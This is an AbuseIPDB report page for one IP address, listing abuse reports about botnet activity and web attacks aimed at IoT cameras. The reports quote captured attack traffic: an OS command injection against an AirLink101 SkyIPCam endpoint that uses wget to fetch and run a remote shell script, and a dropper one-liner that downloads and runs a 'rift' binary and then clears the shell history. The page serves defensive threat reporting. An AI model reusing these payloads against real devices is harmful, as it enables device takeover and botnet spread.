AbuseIPDB » 126.96.36.199
Enter an IP Address, Domain Name, or Subnet:
e.g. 188.8.131.52, microsoft.com, or 184.108.40.206/24
220.127.116.11 was found in our database!
This IP was reported 41 times. Confidence of Abuse is 0%: ?
|ISP||IPv4 Management SRL|
|Usage Type||Data Center/Web Hosting/Transit|
Spot an error? IP info including ISP, Usage Type, and Location provided by IP2Location.
IP Abuse Reports for 18.104.22.168:
This IP address has been reported a total of 41 times from 18 distinct sources. 22.214.171.124 was first reported on , and the most recent report was .
Old Reports: The most recent abuse report for this IP address is from . It is possible that this IP is no longer involved in abusive activities.
||Fraud Orders DDoS Attack Phishing Email Spam Hacking Web App Attack|
[05/Jan/2019:09:40:50 -0500] Rift botnet virus source
||Hacking Web App Attack|
||Web App Attack|
126.96.36.199 - - [25/Dec/2018:16:34:28 +0200] "GET /maker/snwrite.cgi?mac=1234;wget%20http://89.46. ... show more188.8.131.52 - - [25/Dec/2018:16:34:28 +0200] "GET /maker/snwrite.cgi?mac=1234;wget%20http://184.108.40.206/airlink.sh%20-O%20/tmp/666trapgod;chmod%20777%20/tmp/666trapgod;./tmp/666trapgod HTTP/1.1" 400 402
script tries to download abusive binary files, like below:
cd /tmp; wget http://220.127.116.11/bins/rift.x86; chmod 777 *;./rift.x86 exploit.airlink;rm -rf *;history -w;history -c
server 18.104.22.168 runs debian acording to webserver
<address>Apache/2.4.10 (Debian) Server at rce.trade Port 80</address>
rce.trade has ip 22.214.171.124 show less
|Web App Attack IoT Targeted|
AirLink101 SkyIPCam1620W OS Command Injection "GET /maker/snwrite.cgi?mac=1234;wget%20http:// ... show moreAirLink101 SkyIPCam1620W OS Command Injection
"GET /maker/snwrite.cgi?mac=1234;wget%20http://126.96.36.199/airlink.sh%20-O%20/tmp/666trapgod;chmod%20777%20/tmp/666trapgod;./tmp/666trapgod HTTP/1.1" 404 233 "-" "Rift/2.0" show less
|Anonymous||Exploited Host Web App Attack IoT Targeted|
CloudCIX Reconnaissance Scan Detected, PTR: PTR record not found.
Showing 1 to 15 of 41 reports
Is this your IP? You may request to takedown any associated reports. We will attempt to verify your ownership.